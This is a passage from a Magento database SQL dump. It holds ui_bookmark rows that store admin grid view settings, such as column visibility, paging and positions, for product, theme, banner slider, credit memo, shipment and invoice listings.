(19, 2, 'adobe_stock_images_listing', 'default', 1, 'Default View', '{\"views\":{\"default\":{\"label\":\"Default View\",\"index\":\"default\",\"editable\":false,\"data\":{\"search\":{\"value\":\"\"},\"paging\":{\"pageSize\":32,\"current\":1,\"value\":32},\"filters\":{\"applied\":{\"placeholder\":true}},\"columns\":{\"thumbnail_url\":{\"visible\":true,\"sorting\":false},\"relevance\":{\"visible\":false,\"sorting\":false},\"creation\":{\"visible\":false,\"sorting\":false},\"popularity\":{\"visible\":false,\"sorting\":false},\"nb_downloads\":{\"visible\":false,\"sorting\":false},\"undiscovered\":{\"visible\":false,\"sorting\":false},\"overlay\":{\"visible\":true,\"sorting\":false},\"preview\":{\"visible\":true,\"sorting\":false}},\"displayMode\":\"grid\",\"positions\":{\"overlay\":0,\"thumbnail_url\":1,\"preview\":2,\"relevance\":3,\"creation\":4,\"popularity\":5,\"nb_downloads\":6,\"undiscovered\":7}},\"value\":\"Default View\"}}}', '2020-08-10 03:28:06', '2020-08-10 03:28:06'),
(20, 2, 'adobe_stock_images_listing', 'current', 0, NULL, '{\"current\":{\"search\":{\"value\":\"\"},\"paging\":{\"pageSize\":32,\"current\":1,\"value\":32},\"filters\":{\"applied\":{\"placeholder\":true}},\"columns\":{\"thumbnail_url\":{\"visible\":true,\"sorting\":false},\"relevance\":{\"visible\":false,\"sorting\":false},\"creation\":{\"visible\":false,\"sorting\":false},\"popularity\":{\"visible\":false,\"sorting\":false},\"nb_downloads\":{\"visible\":false,\"sorting\":false},\"undiscovered\":{\"visible\":false,\"sorting\":false},\"overlay\":{\"visible\":true,\"sorting\":false},\"preview\":{\"visible\":true,\"sorting\":false}},\"displayMode\":\"grid\",\"positions\":{\"overlay\":0,\"thumbnail_url\":1,\"preview\":2,\"relevance\":3,\"creation\":4,\"popularity\":5,\"nb_downloads\":6,\"undiscovered\":7}}}', '2020-08-10 03:28:08', '2020-08-10 03:28:08'),
(21, 2, 'design_theme_listing', 'default', 1, 'Default View', '{\"views\":{\"default\":{\"label\":\"Default View\",\"index\":\"default\",\"editable\":false,\"data\":{\"filters\":{\"applied\":{\"placeholder\":true}},\"paging\":{\"pageSize\":20,\"current\":1,\"options\":{\"20\":{\"value\":20,\"label\":20},\"30\":{\"value\":30,\"label\":30},\"50\":{\"value\":50,\"label\":50},\"100\":{\"value\":100,\"label\":100},\"200\":{\"value\":200,\"label\":200}},\"value\":20},\"displayMode\":\"grid\",\"positions\":{\"theme_id\":0,\"theme_title\":1,\"parent_theme_title\":2,\"theme_path\":3,\"actions\":4},\"columns\":{\"theme_id\":{\"visible\":false,\"sorting\":\"asc\"},\"theme_title\":{\"visible\":true,\"sorting\":false},\"parent_theme_title\":{\"visible\":true,\"sorting\":false},\"theme_path\":{\"visible\":true,\"sorting\":false},\"actions\":{\"visible\":true,\"sorting\":false}}},\"value\":\"Default View\"}}}', '2020-08-16 23:20:06', '2020-08-16 23:20:06'),
(22, 2, 'design_theme_listing', 'current', 0, NULL, '{\"current\":{\"filters\":{\"applied\":{\"placeholder\":true}},\"paging\":{\"pageSize\":20,\"current\":1,\"options\":{\"20\":{\"value\":20,\"label\":20},\"30\":{\"value\":30,\"label\":30},\"50\":{\"value\":50,\"label\":50},\"100\":{\"value\":100,\"label\":100},\"200\":{\"value\":200,\"label\":200}},\"value\":20},\"displayMode\":\"grid\",\"positions\":{\"theme_id\":0,\"theme_title\":1,\"parent_theme_title\":2,\"theme_path\":3,\"actions\":4},\"columns\":{\"theme_id\":{\"visible\":false,\"sorting\":\"asc\"},\"theme_title\":{\"visible\":true,\"sorting\":false},\"parent_theme_title\":{\"visible\":true,\"sorting\":false},\"theme_path\":{\"visible\":true,\"sorting\":false},\"actions\":{\"visible\":true,\"sorting\":false}}}}', '2020-08-16 23:20:07', '2020-08-16 23:20:07'),
(23, 2, 'design_config_listing', 'default', 1, 'Default View', '{\"views\":{\"default\":{\"label\":\"Default View\",\"index\":\"default\",\"editable\":false,\"data\":{\"filters\":{\"applied\":{\"placeholder\":true}},\"paging\":{\"pageSize\":20,\"current\":1,\"options\":{\"20\":{\"value\":20,\"label\":20},\"30\":{\"value\":30,\"label\":30},\"50\":{\"value\":50,\"label\":50},\"100\":{\"value\":100,\"label\":100},\"200\":{\"value\":200,\"label\":200}},\"value\":20},\"columns\":{\"default\":{\"visible\":true,\"sorting\":false},\"actions\":{\"visible\":true,\"sorting\":false},\"store_website_id\":{\"visible\":true,\"sorting\":false},\"store_group_id\":{\"visible\":true,\"sorting\":false},\"store_id\":{\"visible\":true,\"sorting\":false},\"theme_theme_id\":{\"visible\":true,\"sorting\":false}},\"displayMode\":\"grid\",\"positions\":{\"default\":0,\"store_website_id\":1,\"store_group_id\":2,\"store_id\":3,\"theme_theme_id\":4,\"actions\":5}},\"value\":\"Default View\"}}}', '2020-08-16 23:20:13', '2020-08-16 23:20:13'),
(24, 2, 'design_config_listing', 'current', 0, NULL, '{\"current\":{\"filters\":{\"applied\":{\"placeholder\":true}},\"paging\":{\"pageSize\":20,\"current\":1,\"options\":{\"20\":{\"value\":20,\"label\":20},\"30\":{\"value\":30,\"label\":30},\"50\":{\"value\":50,\"label\":50},\"100\":{\"value\":100,\"label\":100},\"200\":{\"value\":200,\"label\":200}},\"value\":20},\"columns\":{\"default\":{\"visible\":true,\"sorting\":false},\"actions\":{\"visible\":true,\"sorting\":false},\"store_website_id\":{\"visible\":true,\"sorting\":false},\"store_group_id\":{\"visible\":true,\"sorting\":false},\"store_id\":{\"visible\":true,\"sorting\":false},\"theme_theme_id\":{\"visible\":true,\"sorting\":false}},\"displayMode\":\"grid\",\"positions\":{\"default\":0,\"store_website_id\":1,\"store_group_id\":2,\"store_id\":3,\"theme_theme_id\":4,\"actions\":5}}}', '2020-08-16 23:20:14', '2020-08-16 23:20:14'),
(25, 2, 'mpbannerslider_slider_listing', 'default', 1, 'Default View', '{\"views\":{\"default\":{\"label\":\"Default View\",\"index\":\"default\",\"editable\":false,\"data\":{\"filters\":{\"applied\":{\"placeholder\":true}},\"paging\":{\"pageSize\":20,\"current\":1,\"options\":{\"20\":{\"value\":20,\"label\":20},\"30\":{\"value\":30,\"label\":30},\"50\":{\"value\":50,\"label\":50},\"100\":{\"value\":100,\"label\":100},\"200\":{\"value\":200,\"label\":200}},\"value\":20},\"columns\":{\"slider_id\":{\"visible\":true,\"sorting\":\"asc\"},\"name\":{\"visible\":true,\"sorting\":false},\"banners\":{\"visible\":true,\"sorting\":false},\"location\":{\"visible\":true,\"sorting\":false},\"store_ids\":{\"visible\":true,\"sorting\":false},\"customer_group_ids\":{\"visible\":true,\"sorting\":false},\"priority\":{\"visible\":true,\"sorting\":false},\"actions\":{\"visible\":true,\"sorting\":false},\"ids\":{\"visible\":true,\"sorting\":false},\"status\":{\"visible\":true,\"sorting\":false},\"from_date\":{\"visible\":true,\"sorting\":false},\"to_date\":{\"visible\":true,\"sorting\":false}},\"displayMode\":\"grid\",\"positions\":{\"ids\":0,\"slider_id\":1,\"name\":2,\"status\":3,\"banners\":4,\"location\":5,\"store_ids\":6,\"customer_group_ids\":7,\"priority\":8,\"from_date\":9,\"to_date\":10,\"actions\":11}},\"value\":\"Default View\"}}}', '2020-08-16 23:37:08', '2020-08-16 23:37:08'),
(26, 2, 'mpbannerslider_slider_listing', 'current', 0, NULL, '{\"current\":{\"filters\":{\"applied\":{\"placeholder\":true}},\"paging\":{\"pageSize\":20,\"current\":1,\"options\":{\"20\":{\"value\":20,\"label\":20},\"30\":{\"value\":30,\"label\":30},\"50\":{\"value\":50,\"label\":50},\"100\":{\"value\":100,\"label\":100},\"200\":{\"value\":200,\"label\":200}},\"value\":20},\"columns\":{\"slider_id\":{\"visible\":true,\"sorting\":\"asc\"},\"name\":{\"visible\":true,\"sorting\":false},\"banners\":{\"visible\":true,\"sorting\":false},\"location\":{\"visible\":true,\"sorting\":false},\"store_ids\":{\"visible\":true,\"sorting\":false},\"customer_group_ids\":{\"visible\":true,\"sorting\":false},\"priority\":{\"visible\":true,\"sorting\":false},\"actions\":{\"visible\":true,\"sorting\":false},\"ids\":{\"visible\":true,\"sorting\":false},\"status\":{\"visible\":true,\"sorting\":false},\"from_date\":{\"visible\":true,\"sorting\":false},\"to_date\":{\"visible\":true,\"sorting\":false}},\"displayMode\":\"grid\",\"positions\":{\"ids\":0,\"slider_id\":1,\"name\":2,\"status\":3,\"banners\":4,\"location\":5,\"store_ids\":6,\"customer_group_ids\":7,\"priority\":8,\"from_date\":9,\"to_date\":10,\"actions\":11}}}', '2020-08-16 23:37:09', '2020-08-16 23:37:09'),
(27, 2, 'product_listing', 'default', 1, 'Default View', '{\"views\":{\"default\":{\"label\":\"Default View\",\"index\":\"default\",\"editable\":false,\"data\":{\"filters\":{\"applied\":{\"placeholder\":true}},\"columns\":{\"entity_id\":{\"visible\":true,\"sorting\":\"asc\"},\"name\":{\"visible\":true,\"sorting\":false},\"sku\":{\"visible\":true,\"sorting\":false},\"price\":{\"visible\":true,\"sorting\":false},\"websites\":{\"visible\":true,\"sorting\":false},\"qty\":{\"visible\":true,\"sorting\":false},\"short_description\":{\"visible\":false,\"sorting\":false},\"special_price\":{\"visible\":false,\"sorting\":false},\"cost\":{\"visible\":false,\"sorting\":false},\"weight\":{\"visible\":false,\"sorting\":false},\"meta_title\":{\"visible\":false,\"sorting\":false},\"meta_keyword\":{\"visible\":false,\"sorting\":false},\"meta_description\":{\"visible\":false,\"sorting\":false},\"msrp\":{\"visible\":false,\"sorting\":false},\"url_key\":{\"visible\":false,\"sorting\":false},\"actions\":{\"visible\":true,\"sorting\":false},\"type_id\":{\"visible\":true,\"sorting\":false},\"attribute_set_id\":{\"visible\":true,\"sorting\":false},\"visibility\":{\"visible\":true,\"sorting\":false},\"status\":{\"visible\":true,\"sorting\":false},\"manufacturer\":{\"visible\":false,\"sorting\":false},\"color\":{\"visible\":false,\"sorting\":false},\"custom_design\":{\"visible\":false,\"sorting\":false},\"page_layout\":{\"visible\":false,\"sorting\":false},\"country_of_manufacture\":{\"visible\":false,\"sorting\":false},\"custom_layout\":{\"visible\":false,\"sorting\":false},\"gift_message_available\":{\"visible\":false,\"sorting\":false},\"tax_class_id\":{\"visible\":false,\"sorting\":false},\"ids\":{\"visible\":true,\"sorting\":false},\"salable_quantity\":{\"visible\":true,\"sorting\":false},\"special_from_date\":{\"visible\":false,\"sorting\":false},\"special_to_date\":{\"visible\":false,\"sorting\":false},\"news_from_date\":{\"visible\":false,\"sorting\":false},\"news_to_date\":{\"visible\":false,\"sorting\":false},\"custom_design_from\":{\"visible\":false,\"sorting\":false},\"custom_design_to\":{\"visible\":false,\"sorting\":false},\"thumbnail\":{\"visible\":true,\"sorting\":false}},\"paging\":{\"pageSize\":20,\"current\":1,\"options\":{\"20\":{\"value\":20,\"label\":20},\"30\":{\"value\":30,\"label\":30},\"50\":{\"value\":50,\"label\":50},\"100\":{\"value\":100,\"label\":100},\"200\":{\"value\":200,\"label\":200}},\"value\":20},\"search\":{\"value\":\"\"},\"displayMode\":\"grid\",\"positions\":{\"ids\":0,\"entity_id\":1,\"thumbnail\":2,\"name\":3,\"type_id\":4,\"attribute_set_id\":5,\"sku\":6,\"price\":7,\"qty\":8,\"salable_quantity\":9,\"visibility\":10,\"status\":11,\"websites\":12,\"short_description\":13,\"special_price\":14,\"special_from_date\":15,\"special_to_date\":16,\"cost\":17,\"weight\":18,\"manufacturer\":19,\"meta_title\":20,\"meta_keyword\":21,\"meta_description\":22,\"color\":23,\"news_from_date\":24,\"news_to_date\":25,\"custom_design\":26,\"custom_design_from\":27,\"custom_design_to\":28,\"page_layout\":29,\"country_of_manufacture\":30,\"custom_layout\":31,\"msrp\":32,\"url_key\":33,\"gift_message_available\":34,\"tax_class_id\":35,\"actions\":36}},\"value\":\"Default View\"}}}', '2020-08-17 03:47:37', '2020-08-17 03:47:37'),
(28, 2, 'product_listing', 'current', 0, NULL, '{\"current\":{\"filters\":{\"applied\":{\"placeholder\":true}},\"columns\":{\"entity_id\":{\"visible\":true,\"sorting\":\"desc\"},\"name\":{\"visible\":true,\"sorting\":false},\"sku\":{\"visible\":true,\"sorting\":false},\"price\":{\"visible\":true,\"sorting\":false},\"websites\":{\"visible\":true,\"sorting\":false},\"qty\":{\"visible\":true,\"sorting\":false},\"short_description\":{\"visible\":false,\"sorting\":false},\"special_price\":{\"visible\":false,\"sorting\":false},\"cost\":{\"visible\":false,\"sorting\":false},\"weight\":{\"visible\":false,\"sorting\":false},\"meta_title\":{\"visible\":false,\"sorting\":false},\"meta_keyword\":{\"visible\":false,\"sorting\":false},\"meta_description\":{\"visible\":false,\"sorting\":false},\"msrp\":{\"visible\":false,\"sorting\":false},\"url_key\":{\"visible\":false,\"sorting\":false},\"actions\":{\"visible\":true,\"sorting\":false},\"type_id\":{\"visible\":true,\"sorting\":false},\"attribute_set_id\":{\"visible\":true,\"sorting\":false},\"visibility\":{\"visible\":true,\"sorting\":false},\"status\":{\"visible\":true,\"sorting\":false},\"manufacturer\":{\"visible\":false,\"sorting\":false},\"color\":{\"visible\":false,\"sorting\":false},\"custom_design\":{\"visible\":false,\"sorting\":false},\"page_layout\":{\"visible\":false,\"sorting\":false},\"country_of_manufacture\":{\"visible\":false,\"sorting\":false},\"custom_layout\":{\"visible\":false,\"sorting\":false},\"gift_message_available\":{\"visible\":false,\"sorting\":false},\"tax_class_id\":{\"visible\":false,\"sorting\":false},\"ids\":{\"visible\":true,\"sorting\":false},\"salable_quantity\":{\"visible\":true,\"sorting\":false},\"special_from_date\":{\"visible\":false,\"sorting\":false},\"special_to_date\":{\"visible\":false,\"sorting\":false},\"news_from_date\":{\"visible\":false,\"sorting\":false},\"news_to_date\":{\"visible\":false,\"sorting\":false},\"custom_design_from\":{\"visible\":false,\"sorting\":false},\"custom_design_to\":{\"visible\":false,\"sorting\":false},\"thumbnail\":{\"visible\":true,\"sorting\":false}},\"paging\":{\"pageSize\":200,\"current\":1,\"options\":{\"20\":{\"value\":20,\"label\":20},\"30\":{\"value\":30,\"label\":30},\"50\":{\"value\":50,\"label\":50},\"100\":{\"value\":100,\"label\":100},\"200\":{\"value\":200,\"label\":200}},\"value\":200},\"search\":{\"value\":\"\"},\"displayMode\":\"grid\",\"positions\":{\"ids\":0,\"entity_id\":1,\"thumbnail\":2,\"name\":3,\"type_id\":4,\"attribute_set_id\":5,\"sku\":6,\"price\":7,\"qty\":8,\"salable_quantity\":9,\"visibility\":10,\"status\":11,\"websites\":12,\"short_description\":13,\"special_price\":14,\"special_from_date\":15,\"special_to_date\":16,\"cost\":17,\"weight\":18,\"manufacturer\":19,\"meta_title\":20,\"meta_keyword\":21,\"meta_description\":22,\"color\":23,\"news_from_date\":24,\"news_to_date\":25,\"custom_design\":26,\"custom_design_from\":27,\"custom_design_to\":28,\"page_layout\":29,\"country_of_manufacture\":30,\"custom_layout\":31,\"msrp\":32,\"url_key\":33,\"gift_message_available\":34,\"tax_class_id\":35,\"actions\":36}}}', '2020-08-17 03:47:37', '2020-08-17 06:10:29'),
(29, 2, 'product_attributes_listing', 'default', 1, 'Default View', '{\"views\":{\"default\":{\"label\":\"Default View\",\"index\":\"default\",\"editable\":false,\"data\":{\"paging\":{\"pageSize\":20,\"current\":1,\"options\":{\"20\":{\"value\":20,\"label\":20},\"30\":{\"value\":30,\"label\":30},\"50\":{\"value\":50,\"label\":50},\"100\":{\"value\":100,\"label\":100},\"200\":{\"value\":200,\"label\":200}},\"value\":20},\"columns\":{\"ids\":{\"visible\":true,\"sorting\":false},\"is_required\":{\"visible\":true,\"sorting\":false},\"is_user_defined\":{\"visible\":true,\"sorting\":false},\"is_visible\":{\"visible\":true,\"sorting\":false},\"is_global\":{\"visible\":true,\"sorting\":false},\"is_searchable\":{\"visible\":true,\"sorting\":false},\"is_comparable\":{\"visible\":true,\"sorting\":false},\"is_filterable\":{\"visible\":true,\"sorting\":false},\"attribute_code\":{\"visible\":true,\"sorting\":\"asc\"},\"frontend_label\":{\"visible\":true,\"sorting\":false}},\"positions\":{\"ids\":0,\"attribute_code\":1,\"frontend_label\":2,\"is_required\":3,\"is_user_defined\":4,\"is_visible\":5,\"is_global\":6,\"is_searchable\":7,\"is_comparable\":8,\"is_filterable\":9},\"displayMode\":\"grid\"},\"value\":\"Default View\"}}}', '2020-08-17 05:15:33', '2020-08-17 05:15:33'),
(30, 2, 'product_attributes_listing', 'current', 0, NULL, '{\"current\":{\"paging\":{\"pageSize\":20,\"current\":1,\"options\":{\"20\":{\"value\":20,\"label\":20},\"30\":{\"value\":30,\"label\":30},\"50\":{\"value\":50,\"label\":50},\"100\":{\"value\":100,\"label\":100},\"200\":{\"value\":200,\"label\":200}},\"value\":20},\"columns\":{\"ids\":{\"visible\":true,\"sorting\":false},\"is_required\":{\"visible\":true,\"sorting\":false},\"is_user_defined\":{\"visible\":true,\"sorting\":false},\"is_visible\":{\"visible\":true,\"sorting\":false},\"is_global\":{\"visible\":true,\"sorting\":false},\"is_searchable\":{\"visible\":true,\"sorting\":false},\"is_comparable\":{\"visible\":true,\"sorting\":false},\"is_filterable\":{\"visible\":true,\"sorting\":false},\"attribute_code\":{\"visible\":true,\"sorting\":\"asc\"},\"frontend_label\":{\"visible\":true,\"sorting\":false}},\"positions\":{\"ids\":0,\"attribute_code\":1,\"frontend_label\":2,\"is_required\":3,\"is_user_defined\":4,\"is_visible\":5,\"is_global\":6,\"is_searchable\":7,\"is_comparable\":8,\"is_filterable\":9},\"displayMode\":\"grid\"}}', '2020-08-17 05:15:34', '2020-08-17 05:15:34'),
(31, 2, 'mpbannerslider_banner_listing', 'current', 0, NULL, '{\"current\":{\"filters\":{\"applied\":{\"placeholder\":true}},\"paging\":{\"pageSize\":20,\"current\":1,\"options\":{\"20\":{\"value\":20,\"label\":20},\"30\":{\"value\":30,\"label\":30},\"50\":{\"value\":50,\"label\":50},\"100\":{\"value\":100,\"label\":100},\"200\":{\"value\":200,\"label\":200}},\"value\":20},\"columns\":{\"banner_id\":{\"visible\":true,\"sorting\":\"asc\"},\"name\":{\"visible\":true,\"sorting\":false},\"actions\":{\"visible\":true,\"sorting\":false},\"ids\":{\"visible\":true,\"sorting\":false},\"type\":{\"visible\":true,\"sorting\":false},\"status\":{\"visible\":true,\"sorting\":false},\"created_at\":{\"visible\":true,\"sorting\":false},\"updated_at\":{\"visible\":true,\"sorting\":false},\"content\":{\"visible\":true,\"sorting\":false}},\"displayMode\":\"grid\",\"positions\":{\"ids\":0,\"banner_id\":1,\"content\":2,\"name\":3,\"type\":4,\"status\":5,\"created_at\":6,\"updated_at\":7,\"actions\":8}}}', '2020-08-20 00:12:57', '2020-08-20 00:12:57'),
(32, 2, 'mpbannerslider_banner_listing', 'default', 1, 'Default View', '{\"views\":{\"default\":{\"label\":\"Default View\",\"index\":\"default\",\"editable\":false,\"data\":{\"filters\":{\"applied\":{\"placeholder\":true}},\"paging\":{\"pageSize\":20,\"current\":1,\"options\":{\"20\":{\"value\":20,\"label\":20},\"30\":{\"value\":30,\"label\":30},\"50\":{\"value\":50,\"label\":50},\"100\":{\"value\":100,\"label\":100},\"200\":{\"value\":200,\"label\":200}},\"value\":20},\"columns\":{\"banner_id\":{\"visible\":true,\"sorting\":\"asc\"},\"name\":{\"visible\":true,\"sorting\":false},\"actions\":{\"visible\":true,\"sorting\":false},\"ids\":{\"visible\":true,\"sorting\":false},\"type\":{\"visible\":true,\"sorting\":false},\"status\":{\"visible\":true,\"sorting\":false},\"created_at\":{\"visible\":true,\"sorting\":false},\"updated_at\":{\"visible\":true,\"sorting\":false},\"content\":{\"visible\":true,\"sorting\":false}},\"displayMode\":\"grid\",\"positions\":{\"ids\":0,\"banner_id\":1,\"content\":2,\"name\":3,\"type\":4,\"status\":5,\"created_at\":6,\"updated_at\":7,\"actions\":8}},\"value\":\"Default View\"}}}', '2020-08-20 00:13:08', '2020-08-20 00:13:08'),
(33, 2, 'sales_order_creditmemo_grid', 'default', 1, 'Default View', '{\"views\":{\"default\":{\"label\":\"Default View\",\"index\":\"default\",\"editable\":false,\"data\":{\"search\":{\"value\":\"\"},\"filters\":{\"applied\":{\"placeholder\":true}},\"paging\":{\"pageSize\":20,\"current\":1,\"options\":{\"20\":{\"value\":20,\"label\":20},\"30\":{\"value\":30,\"label\":30},\"50\":{\"value\":50,\"label\":50},\"100\":{\"value\":100,\"label\":100},\"200\":{\"value\":200,\"label\":200}},\"value\":20},\"columns\":{\"increment_id\":{\"visible\":true,\"sorting\":false},\"order_increment_id\":{\"visible\":true,\"sorting\":false},\"billing_name\":{\"visible\":true,\"sorting\":false},\"base_grand_total\":{\"visible\":true,\"sorting\":false},\"store_id\":{\"visible\":false,\"sorting\":false},\"billing_address\":{\"visible\":false,\"sorting\":false},\"shipping_address\":{\"visible\":false,\"sorting\":false},\"customer_name\":{\"visible\":false,\"sorting\":false},\"customer_email\":{\"visible\":false,\"sorting\":false},\"shipping_information\":{\"visible\":false,\"sorting\":false},\"subtotal\":{\"visible\":false,\"sorting\":false},\"shipping_and_handling\":{\"visible\":false,\"sorting\":false},\"adjustment_positive\":{\"visible\":false,\"sorting\":false},\"adjustment_negative\":{\"visible\":false,\"sorting\":false},\"order_base_grand_total\":{\"visible\":false,\"sorting\":false},\"actions\":{\"visible\":true,\"sorting\":false},\"ids\":{\"visible\":true,\"sorting\":false},\"created_at\":{\"visible\":true,\"sorting\":false},\"order_created_at\":{\"visible\":true,\"sorting\":false},\"state\":{\"visible\":true,\"sorting\":false},\"order_status\":{\"visible\":false,\"sorting\":false},\"customer_group_id\":{\"visible\":false,\"sorting\":false},\"payment_method\":{\"visible\":false,\"sorting\":false}},\"displayMode\":\"grid\",\"positions\":{\"ids\":0,\"increment_id\":1,\"created_at\":2,\"order_increment_id\":3,\"order_created_at\":4,\"billing_name\":5,\"state\":6,\"base_grand_total\":7,\"order_status\":8,\"store_id\":9,\"billing_address\":10,\"shipping_address\":11,\"customer_name\":12,\"customer_email\":13,\"customer_group_id\":14,\"payment_method\":15,\"shipping_information\":16,\"subtotal\":17,\"shipping_and_handling\":18,\"adjustment_positive\":19,\"adjustment_negative\":20,\"order_base_grand_total\":21,\"actions\":22}},\"value\":\"Default View\"}}}', '2020-08-28 06:07:57', '2020-08-28 06:07:57');
INSERT INTO `ui_bookmark` (`bookmark_id`, `user_id`, `namespace`, `identifier`, `current`, `title`, `config`, `created_at`, `updated_at`) VALUES
(34, 2, 'sales_order_creditmemo_grid', 'current', 0, NULL, '{\"current\":{\"search\":{\"value\":\"\"},\"filters\":{\"applied\":{\"placeholder\":true}},\"paging\":{\"pageSize\":20,\"current\":1,\"options\":{\"20\":{\"value\":20,\"label\":20},\"30\":{\"value\":30,\"label\":30},\"50\":{\"value\":50,\"label\":50},\"100\":{\"value\":100,\"label\":100},\"200\":{\"value\":200,\"label\":200}},\"value\":20},\"columns\":{\"increment_id\":{\"visible\":true,\"sorting\":false},\"order_increment_id\":{\"visible\":true,\"sorting\":false},\"billing_name\":{\"visible\":true,\"sorting\":false},\"base_grand_total\":{\"visible\":true,\"sorting\":false},\"store_id\":{\"visible\":false,\"sorting\":false},\"billing_address\":{\"visible\":false,\"sorting\":false},\"shipping_address\":{\"visible\":false,\"sorting\":false},\"customer_name\":{\"visible\":false,\"sorting\":false},\"customer_email\":{\"visible\":false,\"sorting\":false},\"shipping_information\":{\"visible\":false,\"sorting\":false},\"subtotal\":{\"visible\":false,\"sorting\":false},\"shipping_and_handling\":{\"visible\":false,\"sorting\":false},\"adjustment_positive\":{\"visible\":false,\"sorting\":false},\"adjustment_negative\":{\"visible\":false,\"sorting\":false},\"order_base_grand_total\":{\"visible\":false,\"sorting\":false},\"actions\":{\"visible\":true,\"sorting\":false},\"ids\":{\"visible\":true,\"sorting\":false},\"created_at\":{\"visible\":true,\"sorting\":false},\"order_created_at\":{\"visible\":true,\"sorting\":false},\"state\":{\"visible\":true,\"sorting\":false},\"order_status\":{\"visible\":false,\"sorting\":false},\"customer_group_id\":{\"visible\":false,\"sorting\":false},\"payment_method\":{\"visible\":false,\"sorting\":false}},\"displayMode\":\"grid\",\"positions\":{\"ids\":0,\"increment_id\":1,\"created_at\":2,\"order_increment_id\":3,\"order_created_at\":4,\"billing_name\":5,\"state\":6,\"base_grand_total\":7,\"order_status\":8,\"store_id\":9,\"billing_address\":10,\"shipping_address\":11,\"customer_name\":12,\"customer_email\":13,\"customer_group_id\":14,\"payment_method\":15,\"shipping_information\":16,\"subtotal\":17,\"shipping_and_handling\":18,\"adjustment_positive\":19,\"adjustment_negative\":20,\"order_base_grand_total\":21,\"actions\":22}}}', '2020-08-28 06:07:57', '2020-08-28 06:07:57'),
(35, 2, 'sales_order_view_creditmemo_grid', 'current', 0, NULL, '{\"current\":{\"search\":{\"value\":\"\"},\"filters\":{\"applied\":{\"placeholder\":true}},\"columns\":{\"increment_id\":{\"visible\":true,\"sorting\":false},\"order_increment_id\":{\"visible\":true,\"sorting\":false},\"billing_name\":{\"visible\":true,\"sorting\":false},\"base_grand_total\":{\"visible\":true,\"sorting\":false},\"store_id\":{\"visible\":false,\"sorting\":false},\"billing_address\":{\"visible\":false,\"sorting\":false},\"shipping_address\":{\"visible\":false,\"sorting\":false},\"customer_name\":{\"visible\":false,\"sorting\":false},\"customer_email\":{\"visible\":false,\"sorting\":false},\"shipping_information\":{\"visible\":false,\"sorting\":false},\"subtotal\":{\"visible\":false,\"sorting\":false},\"shipping_and_handling\":{\"visible\":false,\"sorting\":false},\"adjustment_positive\":{\"visible\":false,\"sorting\":false},\"adjustment_negative\":{\"visible\":false,\"sorting\":false},\"order_base_grand_total\":{\"visible\":false,\"sorting\":false},\"actions\":{\"visible\":true,\"sorting\":false},\"ids\":{\"visible\":true,\"sorting\":false},\"created_at\":{\"visible\":true,\"sorting\":false},\"order_created_at\":{\"visible\":true,\"sorting\":false},\"state\":{\"visible\":true,\"sorting\":false},\"order_status\":{\"visible\":false,\"sorting\":false},\"customer_group_id\":{\"visible\":false,\"sorting\":false},\"payment_method\":{\"visible\":false,\"sorting\":false}},\"paging\":{\"pageSize\":20,\"current\":1,\"options\":{\"20\":{\"value\":20,\"label\":20},\"30\":{\"value\":30,\"label\":30},\"50\":{\"value\":50,\"label\":50},\"100\":{\"value\":100,\"label\":100},\"200\":{\"value\":200,\"label\":200}},\"value\":20},\"displayMode\":\"grid\",\"positions\":{\"ids\":0,\"increment_id\":1,\"created_at\":2,\"order_increment_id\":3,\"order_created_at\":4,\"billing_name\":5,\"state\":6,\"base_grand_total\":7,\"order_status\":8,\"store_id\":9,\"billing_address\":10,\"shipping_address\":11,\"customer_name\":12,\"customer_email\":13,\"customer_group_id\":14,\"payment_method\":15,\"shipping_information\":16,\"subtotal\":17,\"shipping_and_handling\":18,\"adjustment_positive\":19,\"adjustment_negative\":20,\"order_base_grand_total\":21,\"actions\":22}}}', '2021-04-13 12:07:40', '2021-04-13 12:07:40'),
(36, 2, 'sales_order_view_shipment_grid', 'current', 0, NULL, '{\"current\":{\"search\":{\"value\":\"\"},\"filters\":{\"applied\":{\"placeholder\":true}},\"columns\":{\"increment_id\":{\"visible\":true,\"sorting\":\"asc\"},\"order_increment_id\":{\"visible\":true,\"sorting\":false},\"shipping_name\":{\"visible\":true,\"sorting\":false},\"total_qty\":{\"visible\":true,\"sorting\":false},\"store_id\":{\"visible\":false,\"sorting\":false},\"customer_name\":{\"visible\":false,\"sorting\":false},\"customer_email\":{\"visible\":false,\"sorting\":false},\"billing_address\":{\"visible\":false,\"sorting\":false},\"shipping_address\":{\"visible\":false,\"sorting\":false},\"shipping_information\":{\"visible\":false,\"sorting\":false},\"actions\":{\"visible\":true,\"sorting\":false},\"ids\":{\"visible\":true,\"sorting\":false},\"created_at\":{\"visible\":true,\"sorting\":false},\"order_created_at\":{\"visible\":true,\"sorting\":false},\"order_status\":{\"visible\":false,\"sorting\":false},\"customer_group_id\":{\"visible\":false,\"sorting\":false},\"payment_method\":{\"visible\":false,\"sorting\":false}},\"paging\":{\"pageSize\":20,\"current\":1,\"options\":{\"20\":{\"value\":20,\"label\":20},\"30\":{\"value\":30,\"label\":30},\"50\":{\"value\":50,\"label\":50},\"100\":{\"value\":100,\"label\":100},\"200\":{\"value\":200,\"label\":200}},\"value\":20},\"displayMode\":\"grid\",\"positions\":{\"ids\":0,\"increment_id\":1,\"created_at\":2,\"order_increment_id\":3,\"order_created_at\":4,\"shipping_name\":5,\"total_qty\":6,\"order_status\":7,\"store_id\":8,\"customer_name\":9,\"customer_email\":10,\"customer_group_id\":11,\"billing_address\":12,\"shipping_address\":13,\"payment_method\":14,\"shipping_information\":15,\"actions\":16}}}', '2021-04-13 12:07:40', '2021-04-13 12:07:40'),
(37, 2, 'sales_order_view_invoice_grid', 'current', 0, NULL, '{\"current\":{\"search\":{\"value\":\"\"},\"filters\":{\"applied\":{\"placeholder\":true}},\"columns\":{\"increment_id\":{\"visible\":true,\"sorting\":\"asc\"},\"order_increment_id\":{\"visible\":true,\"sorting\":false},\"billing_name\":{\"visible\":true,\"sorting\":false},\"grand_total\":{\"visible\":true,\"sorting\":false},\"store_id\":{\"visible\":false,\"sorting\":false},\"billing_address\":{\"visible\":false,\"sorting\":false},\"shipping_address\":{\"visible\":false,\"sorting\":false},\"customer_name\":{\"visible\":false,\"sorting\":false},\"customer_email\":{\"visible\":false,\"sorting\":false},\"shipping_information\":{\"visible\":false,\"sorting\":false},\"subtotal\":{\"visible\":false,\"sorting\":false},\"shipping_and_handling\":{\"visible\":false,\"sorting\":false},\"actions\":{\"visible\":true,\"sorting\":false},\"ids\":{\"visible\":true,\"sorting\":false},\"created_at\":{\"visible\":true,\"sorting\":false},\"order_created_at\":{\"visible\":true,\"sorting\":false},\"state\":{\